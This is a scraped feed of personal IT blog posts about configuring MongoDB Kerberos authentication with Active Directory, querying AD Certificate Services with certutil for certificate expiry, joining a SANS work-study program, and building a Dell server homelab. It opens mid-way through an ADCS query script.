    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\t.sluijter"){ Write-Output "$serial" }


    }


 



If you'd like to take a stab at the intended purpose for the certificate and its keypair, then you can take a gander at the template fields. While the template doesn't guarantee what the cert is for, it ought to give you an impression. 



certutil -view -restrict "requestid=301" -out "commonname,requestername,certificatetemplate"




Kerberos authentication in MongoDB, with Active Directory

$
0
0

I've been studying MongoDB recently, through the excellent Mongo University. I can heartily recommend their online courses! While not entirely self-paced, they allow you enough flexibility to finish each course within a certain timeframe. They combined video lectures with (ungraded) quizes, and graded labs and an exam. Good stuff!


I'm currently taking M310, the MongoDB Security course. One of the subjects covered is Kerberos authentication with MongoDB. In their lectures they show off a use-case with a Linux KDC, but I was more interested in copying the results with my Active Directory server. It took a little puzzling, a few good sources (linked below) and three hours of mucking with the final troubleshooting. But it works very nicely! 


 


On the Active Directory side:


 We'll have to make a normal user / service account first. I'll call it svc-mongo. This can easily be done in many ways; I used ADUC (AD Users and Computers).


Once svc-mongo exists, we'll connect it to a new Kerberos SPN: a Service Principal Name. This is how MongoDB will identify itself to Kerberos. We'll make the SPN, link it to svc-mongo and make the associated keytab (an authentication file, consider it the user's password) all in one blow:



ktpass /out m310.keytab /princ mongodb/database.m310.mongodb.university@CORP.BROEHAHA.NL /mapuser svc-mongo /crypto AES256-SHA1 /ptype KRB5_NT_PRINCIPAL /pass Password2



 


This creates the m310.keytab file and maps the SPN "mongodb/database.m310.mongodb.university" to the svc-mongo account. The SPN is written in the format "service/fullhostname/domain". The password for the user is also changed and some settings are set pertaining to the used cryptography and Kerberos structures. 


You can verify the SPN's existence with the setspn -Q command. For example:



PS C:usersThomasDocuments> setspn -Q mongodb/database.m310.mongodb.university
Checking domain DC=corp,DC=broehaha,DC=nl
CN=svc-mongo,CN=Users,DC=corp,DC=broehaha,DC=nl
       mongodb/database.m310.mongodb.university


Existing SPN found!



 


The m310.keytab file is then copied to the MongoDB server (database.m310.mongodb.university). In my case I use SCP, because I run Mongo on Linux. 


 


On the Linux side:


The m310.keytab file is placed into /etc/, with permissions set to 640 and ownership root:mongod. In order to use the keytab we can set an environment variable: KRB5_KTNAME="/etc/m310.keytab". This can be done in the profile of the user running MongoDB, or on RHEL-derivates in a sysconfig file. 


We need to setup /etc/krb5.conf with the bare minimum, so the Kerberos client can find the domain:



[libdefaults]
default_realm = CORP.BROEHAHA.NL


[realms]
CORP.BROEHAHA.NL = {
kdc = corp.broehaha.nl
admin_server = corp.broehaha.nl
}


[domain_realm]
.corp.broehaha.nl = CORP.BROEHAHA.NL
corp.broehaha.nl = CORP.BROEHAHA.NL


[logging]
default = FILE:/var/log/krb5.log



 


Speaking of finding the domain, there are a few crucial things that need to be setup correctly!



  • Both the KDC and the Mongo host need to be able to resolve eachother's (fully qualified) hostnames and IP addresses.

  • Both hosts need to be in-sync when it comes to their clocks. So yeah, run NTP. 


With that out of the way, we can start making sure that MongoDB knows about my personal user account. If the Mongo database does not yet have any user accounts setup, then we'll need to use the "localhost bypass" so we can setup a root user first. Once there is an administrative user, run MongoD in normal authorization-enabled mode. For example, again the barest of bare minimums:



mongod --auth --bind_ip database.m310.mongodb.university --dbpath /data/db



 


You can then connect as the administrative user so you can setup the Kerberos account(s):



mongo --host database.m310.mongodb.university:27017 --authenticationDatabase admin --user root --password
MongoDB> use $external 
MongoDB> db.createUser({user:"tess@CORP.BROEHAHA.NL", roles:[{role:"root",database:"admin"}]}) 



 


And with that out of the way, now that we can actually use Kerberos-auth. We'll restart MongoD with Kerberos enabled, at the same time disabling the standard Mongo password authentication and thus lock out the root user we used above. 



mongod --auth --bind_ip database.m310.mongodb.university --authenticationMechanisms=GSSAPI --dbpath /data/db



 


We can then request a Kerberos ticket for my own account, start a Mongo shell and authenticate inside Mongo as myself:



root@database:~# kinit tess@CORP.BROEHAHA.NL -V
Using default cache: /tmp/krb5cc_0
Using principal: tess@CORP.BROEHAHA.NL
Password for tess@CORP.BROEHAHA.NL:
Authenticated to Kerberos v5


root@database:~# mongo --host database.m310.mongodb.university:27017
MongoDB shell version: 3.2.21
connecting to: database.m310.mongodb.university:27017/test


MongoDB Enterprise > use $external
switched to db $external


MongoDB Enterprise > db.auth({mechanism:"GSSAPI", user:"tess@CORP.BROEHAHA.NL"})
1



 


HUZZAH! It worked!


Oh right!.. What was the thing that took me hours of troubleshooting? Initially I ran MongoD without the --bind_ip option to tie it to the external IP address and hostname. I was running it on localhost. :( And thus the MongoD process identified itself to the KDC as mongodb/localhost. It never showed that in any logging, so that's why I missed it. I had assumed that simply passing the keytab file was enough to authenticate.


 


Sources:




Certificate life-cycle management with ADCS

$
0
0

Following up on my previous post on querying ADCS with certutil, I spent an hour digging around ADCS some more with a colleague. We were looking for ways to make our lives easier when performing certificate life cycle management, i.e. figuring out which certs need replacing soon. 


Want to find all certs that expire before 0800 on January first 2022?



certutil –view –restrict “NotAfter<1/1/2022 08:00”



 


However, this also shows the revoked certificates, so lets focus on those that have the status "issued". Here's a list of the most interesting disposition values.



certutil –view –restrict “NotAfter<1/1/2022 08:00,Disposition=0x14”



 


Now that'll give us the full dump of those certs, so let's focus on just getting the relevant request IDs.



certutil –view –restrict “NotAfter<1/1/2022 08:00,Disposition=0x14” –out “RequestId”



 


Mind you, many certs can be setup to auto-enroll, which means we can automatically renew them through the ADCS GUI by going into Template Management and telling AD to tweak all currently registered holders, making them re-enroll. That's a neat trick!


Of course this leaves us with a wad of certificates that need manual replacement. It's easier to handle these on a per-template basis. To filter on these, we'll need to get the template ID. You can do this through the ADCS GUI, or you can query a known cert and output it's cert template ID.



certutil –view –restrict “requestid=3162” –out certificatetemplate



 


So our query now becomes:



certutil –view –restrict “NotAfter<1/1/2022 08:00,Disposition=0x14,certificatetemplate=1.3.6.1.4.1.311.21.8.7200461.8477407.14696588202437.5899189.95.14580585.6404328” –out “RequestId”



 


Sure, the output isn't easily used in a script unless you add some output parsing (there are white lines and all manner of kruft around the request IDs), but you get the picture. This will at least help you get a quick feeling for the amount of work you're up against. 



I got accepted as SANS Facilitator!

$
0
0
Great news everyone!

The excitement is palpable!


A number of past colleagues waxed lyrically about SANS trainings: in-depth, high-tech, wizardry, grueling pace and super-hard work! And at the same time one heck of a lot of fun! And I must admit that I've spent quite a few hours browsing their site, drooling at the courses and exams they offer. They certainly are a well known name in the InfoSec world, having a good reputation and being downright famous for their coin challenges and the high level of skill they both garner and require. 


Unfortunately I could never get past the steep bill! Yes, they're very good! But each course rings in around $6000! And their Netwars and exams don't come cheap either! So I just sighed and closed the tab, only to revisit months later. But this year things changed! Somewhere in September I learned something that I should've known before! I don't even remember whether I read about it on Reddit, on Tweakers or on TechExams, but it was a great find nonetheless!


SANS offer what they call the Work/Study Program. To quote their own site:



"The Work Study Program is a popular and competitive method of SANS training which allows a selected applicant the opportunity to attend a live training event as a facilitator at a highly discounted tuition rate. SANS facilitators are cheerful, friendly, and ever-ready professionals who are selected to assist SANS staff and instructors in conducting a positive learning environment. Advantages of the SANS Work Study Program include:



  • Attend and participate in a 4-6 day course

  • Receive related courseware materials

  • Work with Certified Instructors and SANS Staff

  • Attend applicable Vendor Lunch & Learns, SANS@Night, and other Special Events

  • Opportunities to network with security professionals

  • Free corresponding GIAC certification exam attempt [if available], when lodging onsite at the host hotel

  • Request early access to online OnDemand integrated slides and notes [if available]"



How great is that?! By helping out at the event and putting in a lot of hard work, you get a discount, plus a whole wad of extras to make sure you still get the full benefit of the training you signed up for! I decided then and there to apply for the role of Facilitator for the upcoming Amsterdam event, in January 2019.


I honestly did not think I stood much of a chance because, as SANS say, it's highly competitive and SANS often prefer past SANS-students or -facilitators and I am neither. On the upside, I do have a lot of organizational experience in running events, with many thanks to all those years of staffing and volunteering with AnimeCon


I'd almost forgotten about my application, until a few weeks ago when the email above shows up! OMG! O_O I got accepted!


Now that all the paperwork has been settled I also have a better grasp of both my responsibilities and the perks I'll be receiving. I was assigned to SEC566 - Implementing and Auditing Critical Security Controls, a five-day course (the whole event actually last six days). My duties at the event are actually not disimilar to gophering at AnimeCon! I'll be assisting the course's trainer, basically not leaving their side unless they need something from outside. I'll also be responsible for the security of the assigned classroom and will act a sort-of guide and friendly face to the other students. Where "normal" students will have 0900-1700 days, mine will most likely be 0700-1900. That's gonna be tough! The Sunday before the event starts will also be a full workday, preparing the venue with all the cabling, networking, equipment and the book bags for students. 


And that discount we're getting? When I signed up I had not fully understood what SANS wrote on their site:



"The Work Study tuition fee is USD 1,500 or EUR 1,300 plus any VAT depending on the event location. Should you be selected to facilitate a Summit presentation, the fee is $250 or 217 per day plus any VAT for European events. International Tax/VAT will apply for certain events."



A €1300 discount sounded pretty darn good to me, when combined with all those bonuses! Turns out I misunderstood. The final fee is €1300! So on a total value of >$8100, they're discounting me €6800.  O_O


To say I'm stoked for SANS Amsterdam, would be severely understating my situation! I am very grateful for being given this opportunity and I'm going to work my ass off! I'll make sure SANS won't regret having accepted me!



Expanding my homelab

$
0
0
(C) Dell

For the past X years, I've ran my homelab on my Macbook Air. I've always been impressed with how much you can get away with, on this light portable, sporting an i5 and 8GB of RAM. It'll run two Win2012 VMs and a number of small Linux hosts, aside the MacOS host.


But there's the urge for more! I've been playing with so much cool stuff over the years! I wan't to emulate a whole corporate environment for my studies and tests!


Like the OpenSOC folks, I've been eyeing those Skull Canyon Intel NUCs. They're so sexy! Tiny footprint, combined with great performance! But they're also quite expensive and they don't have proper storage on board. My colleague Martin put me on the trail of local refurbishers and last week I hit gold. 


Well... Fool's Gold, maybe. But still! It was shiny, it looked decent and the price was okay. I bought a refurbished Dell R410


Quick specs:



  • 2x Xeon quad core E5620 @2.4GHz

  • 16 GB RAM

  • 2x 2TB SATA HDD, connected to the 6i (cheaper) RAID controller.

  • Room for 2 more HDD, though I'd have to spend €20 for two brackets.

  • iDRAC6 Enterprise 


Yes, it's pretty old already (generation 11 Dell hardware). Yes, it's power hungry. Yes, it's loud. But it was affordable and it's giving me a chance to work with enterprise hardware again, after being out of the server rooms for a long while. 


After receiving the pizza box and inspecting it for damage, the first order of business was to setup its iDRAC6. iDRAC is Dell's solution to what vendors like HP call ILO: a tiny bit of embedded hardware that can be used across the network to manage the whole server's hardware.


The iDRAC configuration was tackled swiftly and the web interface was available immediately. It took a bit of digging in Dell's documentation, but I learned how to flash the iDRAC6 firmware so I could upgrade it to the latest (2.95) version. It really was as easy as downloading the "monolithic" iDRAC firmware, extracting the .D6 file and uploading it through the iDRAC web interface. Actually finding the upload/update button in the interface took more effort :p


Getting the iDRAC6 remote console working took a little more research. For version 6 of the hardware, the remote console relies upon a Java application, which you can call by clicking a button in the web interface. What this does is download a JNLP configuration file, which in turn downloads the actual JAR file for execution. This is a process that doesn't work reliably on modern MacOS due to all the restrictions put on Java. The good news is that Github user Nicola ("XBB") provides instructions on how to reliably and quickly start the remote console for any iDRAC6 on MacOS, Linux and Windows. 


Last night I installed VMWare ESXi 6.5, which I've been told is the highest version that'll work on this box. No worries, it's good stuff! The installation worked well, installing onto a SanDisk Cruzer Fit mini USB-drive that's stuck into the front panel. I still have a lot of learning to do with VMWare :)


In the mean time, there's two VMs building and updating (Win2012 and CentOS7), so I can use them as the basis for my "corporate" environment. 


My plans for the near future:



  • Build an AD domain.

  • Build an AD CS-based PKI. 

  • Extend the PKI with a smartcard or USB HSM for private key storage.

  • Build a Graylog stack for logging.

  • Build a TIG stack for monitoring.

  • Later on add a pfSense box to serve as gateway, seperating my lab from our home's network.


I'm having so much fun! :D



Viewing all 173 articles
Browse latest View live